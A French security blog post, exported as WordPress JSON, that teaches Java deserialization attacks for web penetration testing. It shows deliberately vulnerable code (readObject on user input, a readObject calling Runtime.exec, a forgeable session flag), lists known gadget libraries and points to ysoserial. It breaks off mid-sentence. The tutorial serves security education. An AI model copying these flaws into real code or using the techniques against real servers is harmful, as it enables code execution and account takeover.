{"id":15728,"date":"2019-07-10T10:00:29","date_gmt":"2019-07-10T09:00:29","guid":{"rendered":"https:\/\/www.riskinsight-wavestone.com\/?p=15728"},"modified":"2021-07-07T16:15:02","modified_gmt":"2021-07-07T15:15:02","slug":"techniques-outils-deserialisation-java","status":"publish","type":"post","link":"https:\/\/www.riskinsight-wavestone.com\/en\/2019\/07\/techniques-outils-deserialisation-java\/","title":{"rendered":"Techniques et outils d\u2019attaque sur les moteurs de d\u00e9s\u00e9rialisation (Java)"},"content":{"rendered":"<figure id=\"post-15730 media-15730\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15730 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png\" alt=\"\" width=\"640\" height=\"155\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1-437x106.png 437w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1-71x17.png 71w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<div class=\"separator\" style=\"clear: both; text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">\n<h1>Introduction<\/h1>\n<\/div>\n<div style=\"text-align: justify;\">La s\u00e9rialisation consiste \u00e0 transformer un objet applicatif en un format de donn\u00e9es pouvant \u00eatre restaur\u00e9 ult\u00e9rieurement. Ce proc\u00e9d\u00e9 est utilis\u00e9 pour sauvegarder des objets ou les envoyer dans le cadre de communications.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<figure id=\"post-15732 media-15732\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15732 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I2.png\" alt=\"\" width=\"640\" height=\"314\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I2.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I2-389x191.png 389w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I2-71x35.png 71w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<div class=\"separator\" style=\"clear: both; text-align: center;\"><\/div>\n<p>&nbsp;<\/p>\n<div style=\"text-align: justify;\">Exemple de s\u00e9rialisation d&#8217;une variable de type <i>String<\/i>\u00a0en Java:<\/div>\n<div><\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\"><span class=\"sc11\">String<\/span> <span class=\"sc11\">name<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc6\">&#8220;Wavestone&#8221;<\/span><span class=\"sc10\">;<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">FileOutputStream<\/span> <span class=\"sc11\">file<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc5\">new<\/span> <span class=\"sc11\">FileOutputStream<\/span><span class=\"sc10\">(<\/span><span class=\"sc6\">&#8220;file.bin&#8221;<\/span><span class=\"sc10\">);<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">ObjectOutputStream<\/span> <span class=\"sc11\">out<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc5\">new<\/span> <span class=\"sc11\">ObjectOutputStream<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">file<\/span><span class=\"sc10\">);<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">out<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">writeObject<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">name<\/span><span class=\"sc10\">);<\/span><\/span><\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Le fichier <b>file.bin<\/b> contenant l\u2019objet name s\u00e9rialis\u00e9 a cette forme :<\/div>\n<div><\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\">AC ED 00 05 74 00 09 <span class=\"w-grepped\">57 61 76 65 73 74 6f 6e 65<\/span> &#8230;.t..<span class=\"w-grepped\">Wavestone<\/span><\/span><\/div>\n<div style=\"text-align: justify;\"><\/div>\n<ul>\n<li>La cha\u00eene commence par \u201c<b>AC ED<\/b>\u201d \u2013 il s\u2019agit du code hexad\u00e9cimal identifiant la donn\u00e9e s\u00e9rialis\u00e9e, toutes les donn\u00e9es s\u00e9rialis\u00e9es commencent par cette valeur.<\/li>\n<li>Le protocole de s\u00e9rialisation version \u201c<b>00 05<\/b>\u201d.<\/li>\n<li>Le type de variable String est identifi\u00e9 par le code \u201c<b>74<\/b>\u201d.<\/li>\n<li>Puis la taille de la variable \u201c<b>00 09<\/b>\u201d.<\/li>\n<li>Et finalement la variable en elle-m\u00eame.<\/li>\n<\/ul>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">La d\u00e9s\u00e9rialisation est l&#8217;inverse de ce processus, prenant des donn\u00e9es structur\u00e9es \u00e0 partir d&#8217;un format et les reconstruisant en un objet. Le format de donn\u00e9es le plus r\u00e9pandu pour la s\u00e9rialisation des donn\u00e9es est JSON (dans le pass\u00e9, le format XML \u00e9tait majoritaire).<\/div>\n<div style=\"text-align: justify;\">Pour reprendre l\u2019exemple en Java sus-cit\u00e9 :<\/div>\n<div><\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\"><span class=\"w-code\"><span class=\"sc11\">FileInputStream<\/span> <span class=\"sc11\">file<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc5\">new<\/span> <span class=\"sc11\">FileInputStream<\/span><span class=\"sc10\">(<\/span><span class=\"sc6\">&#8220;file.bin&#8221;<\/span><span class=\"sc10\">);<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">ObjectInputStream<\/span> <span class=\"sc11\">out<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc5\">new<\/span> <span class=\"sc11\">ObjectInputStream<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">file<\/span><span class=\"sc10\">);<\/span><\/span><\/span><span class=\"w-code\"><span class=\"sc11\">name<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc10\">(<\/span><span class=\"sc11\">String<\/span><span class=\"sc10\">)<\/span><span class=\"sc11\">out<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">readObject<\/span><span class=\"sc10\">();<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">System<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">out<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">println<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">name<\/span><span class=\"sc10\">);<\/span><\/span><\/div>\n<div style=\"text-align: justify;\">Le r\u00e9sultat dans la console sera donc<\/div>\n<div><\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\">Wavestone<\/span><\/div>\n<div><\/div>\n<div style=\"text-align: justify;\">La fonction <i>readObject <\/i>est appel\u00e9e pour d\u00e9s\u00e9rialiser l&#8217;objet (\u00e0 l&#8217;aide de <i>ObjectInputStream<\/i>) &#8211; et le convertir en String.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">La d\u00e9s\u00e9rialisation a de multiples cas d\u2019usage pour les d\u00e9veloppeurs, par exemple (ici en Java) :<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li>D\u00e9s\u00e9rialiser un objet \u201c<i>SQLConnection<\/i>\u201d pour se connecter \u00e0 une base de donn\u00e9es<\/li>\n<li>D\u00e9s\u00e9rialiser un objet \u201c<i>User<\/i>\u201d pour r\u00e9cup\u00e9rer des informations stock\u00e9es dans une base de donn\u00e9es en ex\u00e9cutant des requ\u00eates SQL sp\u00e9cifiques<\/li>\n<li>D\u00e9s\u00e9rialiser un objet \u201c<i>LogFile<\/i>\u201d pour restaurer les donn\u00e9es pr\u00e9c\u00e9demment enregistr\u00e9es sur un profil utilisateur<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\"><b>De nombreux langages de programmation offrent une capacit\u00e9 native de s\u00e9rialisation<\/b> des objets. Ces formats natifs offrent g\u00e9n\u00e9ralement davantage de fonctionnalit\u00e9s que JSON ou XML, y compris la personnalisation du processus de s\u00e9rialisation.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Malheureusement, les fonctionnalit\u00e9s de ces <b>m\u00e9canismes de d\u00e9s\u00e9rialisation natifs peuvent \u00eatre d\u00e9tourn\u00e9es \u00e0 des fins malveillantes<\/b> lorsque la donn\u00e9e \u00e0 d\u00e9s\u00e9rialiser est en fait une charge utile forg\u00e9e sp\u00e9cifiquement par un attaquant pour \u00eatre interpr\u00e9t\u00e9 comme du code \u00e0 ex\u00e9cuter.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Les attaques contre les moteurs de d\u00e9s\u00e9rialisation permettent notamment des attaques par <b>d\u00e9ni de service<\/b>, de <b>contournement de contr\u00f4le d&#8217;acc\u00e8s<\/b> et <b>d&#8217;ex\u00e9cution de code \u00e0 distance<\/b> (RCE).<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">\n<h2>Exemple d\u2019attaque : RCE<\/h2>\n<\/div>\n<div style=\"text-align: justify;\">Cet exemple de code r\u00e9cup\u00e8re un param\u00e8tre appel\u00e9 <i>csrfValue<\/i>, qui est un jeton anti-CSRF pr\u00e9sent sur une application web, envoy\u00e9 \u00e0 l\u2019application sous forme de param\u00e8tre HTTP GET.<\/div>\n<div style=\"text-align: justify;\">Pour cela, le param\u00e8tre est r\u00e9cup\u00e9r\u00e9 sous forme de String puis converti en <i>ByteArrayInputStream <\/i>et lu via la fonction <i>readObject<\/i>() pour \u00eatre d\u00e9s\u00e9rialis\u00e9.<\/div>\n<div><\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\"><span class=\"sc11\">String<\/span> <span class=\"sc11\">parameterValue<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc11\">request<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">getParameter<\/span><span class=\"sc10\">(<\/span><span class=\"sc6\">&#8220;csrfValue&#8221;<\/span><span class=\"sc10\">);<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">\u2026<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc16\">byte<\/span><span class=\"sc10\">[]<\/span> <span class=\"sc11\">csrfBytes<\/span> <span class=\"sc10\">=<\/span><span class=\"sc11\">DatatypeConverter<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">parseBase64Binary<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">parameterValue<\/span><span class=\"sc10\">);<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">ByteArrayInputStream<\/span> <span class=\"sc11\">bis<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc5\">new<\/span> <span class=\"sc11\">ByteArrayInputStream<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">csrfBytes<\/span><span class=\"sc10\">);<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">ObjectInput<\/span> <span class=\"sc11\">in<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc5\">new<\/span> <span class=\"sc11\">ObjectInputStream<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">bis<\/span><span class=\"sc10\">);<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">csrfToken<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc10\">(<\/span><span class=\"sc11\">CSRF<\/span><span class=\"sc10\">)<\/span><span class=\"sc11\">in<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">readObject<\/span><span class=\"sc10\">();<\/span><span class=\"sc0\"><br \/>\n<\/span><\/span><\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Cette fonction est <b>potentiellement vuln\u00e9rable<\/b>:\u00a0en effet, la fonction <i>readObject<\/i>() est appel\u00e9 sur des valeurs <b>envoy\u00e9es par l\u2019utilisateur<\/b> en tant que param\u00e8tre <i>csrfValue <\/i>de la requ\u00eate HTTP.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">En effet, la fonction <i>readObject<\/i>() a pour sp\u00e9cificit\u00e9 de pouvoir \u00eatre impl\u00e9ment\u00e9e dans les classes <i>Serializable <\/i>qui en ont besoin pour lire un objet s\u00e9rialis\u00e9.<\/div>\n<div style=\"text-align: justify;\">Imaginons par exemple que la classe CSRF vue plus haut contienne pour une raison obscure ce morceau de code :<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\"><span class=\"sc16\">public<\/span> <span class=\"sc16\">class<\/span> <span class=\"sc11\">CSRF<\/span> <span class=\"sc5\">implements<\/span> <span class=\"sc11\">Serializable<\/span> <span class=\"sc10\">{<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">\u2026<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc16\">public<\/span> <span class=\"sc11\">String<\/span> <span class=\"sc11\">command<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc6\">&#8220;ls&#8221;<\/span><span class=\"sc10\">;<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">\u2026<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc16\">public<\/span> <span class=\"sc16\">void<\/span> <span class=\"sc11\">execCommand<\/span><span class=\"sc10\">(){<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">\u2026<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">Runtime<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">getRuntime<\/span><span class=\"sc10\">().<\/span><span class=\"sc11\">exec<\/span><span class=\"sc10\">(<\/span><span class=\"sc5\">this<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">command<\/span><span class=\"sc10\">);<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">\u2026<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc16\">private<\/span> <span class=\"sc16\">void<\/span> <span class=\"sc11\">readObject<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">java<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">io<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">ObjectInputStream<\/span> <span class=\"sc11\">in<\/span><span class=\"sc10\">)<\/span> <span class=\"sc5\">throws<\/span> <span class=\"sc11\">IOException<\/span><span class=\"sc10\">,<\/span> <span class=\"sc11\">ClassNotFoundException<\/span> <span class=\"sc10\">{<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">\u2026<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc5\">this<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">execCommand<\/span><span class=\"sc10\">();<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc10\">}<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc10\">}<\/span><span class=\"sc0\"><br \/>\n<\/span><\/span><\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">L\u2019attaquant n\u2019aurait qu\u2019\u00e0 forger un objet CSRF s\u00e9rialis\u00e9 (r\u00e9cup\u00e9r\u00e9 par le code plus haut dans <i>csrfValue<\/i>) contenant un param\u00e8tre command contenant la commande de son choix pour ex\u00e9cuter du code arbitrairement sur le serveur.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">En effet :<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><i>ObjectInputStream <\/i>ne v\u00e9rifie pas quelle classe est d\u00e9s\u00e9rialis\u00e9e<\/li>\n<li>Il n\u2019y a pas de liste blanche ou noire de classes autoris\u00e9es \u00e0 \u00eatre d\u00e9s\u00e9rialis\u00e9es<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Ce cas de figure tr\u00e8s facile \u00e0 exploiter d\u2019une impl\u00e9mentation de <i>readObject<\/i>() ex\u00e9cutant directement du code est toutefois tr\u00e8s rare dans la r\u00e9alit\u00e9.<\/div>\n<div style=\"text-align: justify;\">Ce qui arrive le plus fr\u00e9quemment est que l\u2019attaquant trouve une fonction ou une classe vuln\u00e9rable \u00e0 la modification de ses param\u00e8tres, qui peut appeler une autre fonction ou instancier une autre classe dans son p\u00e9rim\u00e8tre d\u2019ex\u00e9cution.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Les classes et fonctions disponibles dans le p\u00e9rim\u00e8tre d\u2019ex\u00e9cution d\u2019une application sont appel\u00e9es \u00ab <b>gadget <\/b>\u00bb. Suite \u00e0 l\u2019envoi d\u2019une charge malveillante \u00e0 un premier gadget appel\u00e9 \u00ab <b>kick-off gadget<\/b> \u00bb, une cha\u00eene d\u2019appels et d\u2019invocation est lanc\u00e9e jusqu\u2019\u00e0 tomber sur un gadget qui est vuln\u00e9rable \u00e0 l\u2019ex\u00e9cution de code arbitraire, appel\u00e9 \u00ab <b>sink gadget <\/b>\u00bb :<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15734 media-15734\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15734 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I3.png\" alt=\"\" width=\"640\" height=\"218\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I3.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I3-437x149.png 437w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I3-71x24.png 71w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<div class=\"separator\" style=\"clear: both; text-align: center;\"><\/div>\n<\/div>\n<div style=\"text-align: justify;\">De nombreux sink gadget existent dans les librairies de s\u00e9rialisation\/d\u00e9s\u00e9rialisation standard, notamment :<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><b>Spring AOP <\/b>(d\u00e9voil\u00e9 par Wouter Coekaerts en 2011)<\/li>\n<li><b>Commons-\ufb01leupload <\/b>(d\u00e9voil\u00e9 par Arun Babu Neelicattu en 2013)<\/li>\n<li><b>Groovy <\/b>(d\u00e9voil\u00e9 par cpnrodzc7 \/ @frohoff en 2015)<\/li>\n<li><b>Apache Commons-Collections<\/b> (d\u00e9voil\u00e9 par @frohoff et @gebl en 2015)<\/li>\n<li><b>Spring Beans<\/b> (d\u00e9voil\u00e9 par @frohoff et @gebl en 2015)<\/li>\n<li><b>Serial DoS<\/b> (d\u00e9voil\u00e9 par Wouter Coekaerts en 2015)<\/li>\n<li><b>SpringTx<\/b> (d\u00e9voil\u00e9 par @zerothinking en 2016)<\/li>\n<li><b>JDK7<\/b> (d\u00e9voil\u00e9 par @frohoff en 2016)<\/li>\n<li><b>Beanutils<\/b> (d\u00e9voil\u00e9 par @frohoff en 2016)<\/li>\n<li><b>Hibernate, MyFaces, C3P0, net.sf.json, ROME<\/b> (d\u00e9voil\u00e9 par M. Bechler en 2016)<\/li>\n<li><b>Beanshell <\/b>(d\u00e9voil\u00e9 par @pwntester et @cschneider4711 en 2016)<\/li>\n<li><b>JDK7 Rhino <\/b>(d\u00e9voil\u00e9 par @matthias_kaiser en 2016)<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Des <b>outils g\u00e9n\u00e9rant des charges utiles sp\u00e9cialement con\u00e7ues pour attaquer des gadgets<\/b> affect\u00e9s par des vuln\u00e9rabilit\u00e9s publiques dans les librairies les plus utilis\u00e9es existent, notamment le tr\u00e8s complet <b>ysoserial<\/b>, d\u00e9velopp\u00e9 par Frohoff : <a href=\"https:\/\/github.com\/frohoff\/ysoserial\">https:\/\/github.com\/frohoff\/ysoserial<\/a>.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">\n<h2>Exemple d\u2019attaque : Compromission de compte utilisateur<\/h2>\n<\/div>\n<div style=\"text-align: justify;\">Si un attaquant contr\u00f4le les donn\u00e9es qui sont d\u00e9s\u00e9rialis\u00e9e par une application, il a alors une influence sur les variables en m\u00e9moire et les objets applicatifs. Il peut alors influencer le flux de code utilisant ces variables et ces objets.<\/div>\n<div style=\"text-align: justify;\">Voyons un exemple d\u2019attaque sur un morceau de code utilisant la d\u00e9s\u00e9rialisation en Java :<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\"><span class=\"w-code\"><span class=\"sc16\">public<\/span> <span class=\"sc16\">class<\/span> <span class=\"sc11\">Session<\/span> <span class=\"sc10\">{<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc16\">public<\/span> <span class=\"sc11\">String<\/span> <span class=\"sc11\">username<\/span><span class=\"sc10\">;<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc16\">public<\/span> <span class=\"sc16\">boolean<\/span> <span class=\"sc11\">loggedIn<\/span><span class=\"sc10\">;<\/span><\/span><\/span><span class=\"w-code\"><span class=\"sc16\">public<\/span> <span class=\"sc16\">void<\/span> <span class=\"sc11\">loadSession<\/span><span class=\"sc10\">(<\/span><span class=\"sc16\">byte<\/span><span class=\"sc10\">[]<\/span> <span class=\"sc11\">sessionData<\/span><span class=\"sc10\">)<\/span> <span class=\"sc5\">throws<\/span> <span class=\"sc11\">Exception<\/span> <span class=\"sc10\">{<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">ObjectInputStream<\/span> <span class=\"sc11\">ois<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc5\">new<\/span> <span class=\"sc11\">ObjectInputStream<\/span><span class=\"sc10\">(<\/span><span class=\"sc5\">new<\/span> <span class=\"sc11\">ByteArrayInputStream<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">sessionData<\/span><span class=\"sc10\">));<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc5\">this<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">username<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc11\">ois<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">readUTF<\/span><span class=\"sc10\">();<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc5\">this<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">loggedIn<\/span> <span class=\"sc10\">=<\/span> <span class=\"sc11\">ois<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">readBoolean<\/span><span class=\"sc10\">();<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc10\">}<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc10\">}<\/span><span class=\"sc0\"><br \/>\n<\/span><\/span><\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">La m\u00e9thode <i>loadSession <\/i>accepte un tableau d\u2019octets en tant que param\u00e8tre et d\u00e9s\u00e9rialise une cha\u00eene et un bool\u00e9en de ce tableau d&#8217;octets dans les propri\u00e9t\u00e9s <i>username <\/i>et <i>loggedIn <\/i>de l&#8217;objet.<\/div>\n<div style=\"text-align: justify;\">Si un attaquant peut contr\u00f4ler le contenu du tableau d\u2019octets <i>sessionData <\/i>transmis \u00e0 cette m\u00e9thode, il peut alors contr\u00f4ler les propri\u00e9t\u00e9s de cet objet : <i>username <\/i>et <i>loggedIn<\/i>.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Voici un exemple d&#8217;utilisation de cet objet <i>Session <\/i>dans une fonction de changement de mot de passe :<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\"><span class=\"w-code\"><span class=\"sc16\">public<\/span> <span class=\"sc16\">class<\/span> <span class=\"sc11\">UserSettingsController<\/span> <span class=\"sc10\">{<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc16\">public<\/span> <span class=\"sc16\">void<\/span> <span class=\"sc11\">updatePassword<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">Session<\/span> <span class=\"sc11\">session<\/span><span class=\"sc10\">,<\/span> <span class=\"sc11\">String<\/span> <span class=\"sc11\">newPassword<\/span><span class=\"sc10\">)<\/span> <span class=\"sc5\">throws<\/span> <span class=\"sc11\">Exception<\/span> <span class=\"sc10\">{<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc5\">if<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">session<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">loggedIn<\/span><span class=\"sc10\">)<\/span> <span class=\"sc10\">{<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc11\">UserModel<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">updatePassword<\/span><span class=\"sc10\">(<\/span><span class=\"sc11\">session<\/span><span class=\"sc10\">.<\/span><span class=\"sc11\">username<\/span><span class=\"sc10\">,<\/span> <span class=\"sc11\">newPassword<\/span><span class=\"sc10\">);<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc10\">}<\/span> <span class=\"sc5\">else<\/span> <span class=\"sc10\">{<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc5\">throw<\/span> <span class=\"sc5\">new<\/span> <span class=\"sc11\">Exception<\/span><span class=\"sc10\">(<\/span><span class=\"sc6\">&#8220;Error: User not logged in.&#8221;<\/span><span class=\"sc10\">);<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc10\">}<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc10\">}<\/span><span class=\"sc0\"><br \/>\n<\/span><span class=\"sc10\">}<\/span><span class=\"sc0\"><br \/>\n<\/span><\/span><\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Si le param\u00e8tre <i>loggedIn <\/i>de l\u2019objet session vaut 1, le mot de passe de l&#8217;utilisateur dont le <i>username <\/i>correspond au param\u00e8tre idoine de l\u2019objet session est mis \u00e0 jour avec la valeur <i>newPassword <\/i>donn\u00e9e.<\/div>\n<div style=\"text-align: justify;\">Ici, si l\u2019attaquant peut contr\u00f4ler le contenu du tableau d\u2019octets <i>sessionData <\/i>alors il pourrait changer le mot de passe de n\u2019importe quel utilisateur !<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">C\u2019est un exemple simple de \u00ab <b>Property Oriented Programming Gadget<\/b> \u00bb, un morceau de code sur lequel l\u2019attaquant peut agir non pas en direct mais via les propri\u00e9t\u00e9s d\u2019un objet.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Un point important \u00e0 retenir de cet exemple est qu&#8217;<b>un exploit de d\u00e9s\u00e9rialisation n&#8217;implique pas forc\u00e9ment l&#8217;envoi de classes ou de code<\/b> au serveur \u00e0 ex\u00e9cuter.<\/div>\n<div style=\"text-align: justify;\">L\u2019attaquant envoie simplement des donn\u00e9es qui seront int\u00e9gr\u00e9es dans propri\u00e9t\u00e9s des classes dont le serveur a d\u00e9j\u00e0 connaissance afin de manipuler le code existant traitant de ces propri\u00e9t\u00e9s.<\/div>\n<div style=\"text-align: justify;\"><b>Un exploit r\u00e9ussi repose donc \u00e9norm\u00e9ment sur la connaissance du code<\/b> qui peut \u00eatre manipul\u00e9 par d\u00e9s\u00e9rialisation. D\u2019o\u00f9 beaucoup de difficult\u00e9s \u00e0 exploiter les vuln\u00e9rabilit\u00e9s de type d\u00e9s\u00e9rialisation malgr\u00e9 l\u2019impact parfois colossal de ce type de failles.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">\n<h1>Apr\u00e8s la th\u00e9orie, la pratique<\/h1>\n<\/div>\n<div style=\"text-align: justify;\">Maintenant que vous savez tout (ou presque) sur la s\u00e9rialisation\/d\u00e9s\u00e9rialisation Java et ses faiblesses, passons \u00e0 la pratique :<\/div>\n<div style=\"text-align: justify;\">\n<ol>\n<li>Comment <b>trouver les fonctions utilisant la d\u00e9s\u00e9rialisation<\/b> lors d\u2019un test d&#8217;intrusion web et les librairies utilis\u00e9es ?<\/li>\n<li>Comment <b>attaquer ces fonctions<\/b> et potentiellement r\u00e9ussir \u00e0 ex\u00e9cuter du code sur le serveur ?<\/li>\n<\/ol>\n<\/div>\n<div style=\"text-align: justify;\">\n<h2>Trouver les fonctions \u00e0 attaquer<\/h2>\n<\/div>\n<div style=\"text-align: justify;\">\n<h3>M\u00e9thode 1 : A la main, pour plus de finesse<\/h3>\n<\/div>\n<div style=\"text-align: justify;\">La premi\u00e8re \u00e9tape de l\u2019audit consiste \u00e0 identifier l\u2019utilisation de la d\u00e9s\u00e9rialisation dans l\u2019application audit\u00e9e. Pour cela, diff\u00e9rentes m\u00e9thodes sont possibles :<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><b>Chercher la s\u00e9quence hexad\u00e9cimale<\/b> suivante dans les transactions (captur\u00e9es par burp) entre votre machine et le serveur : <i>0xAC ED<\/i>.\n<ul>\n<li>Cette s\u00e9quence de 2 octets est appel\u00e9e \u00ab <b>magic number<\/b> \u00bb et est pr\u00e9sente au d\u00e9but de chaque objet s\u00e9rialis\u00e9. Elle est suivie du num\u00e9ro de version, souvent 00 05.<\/li>\n<li>Attention : 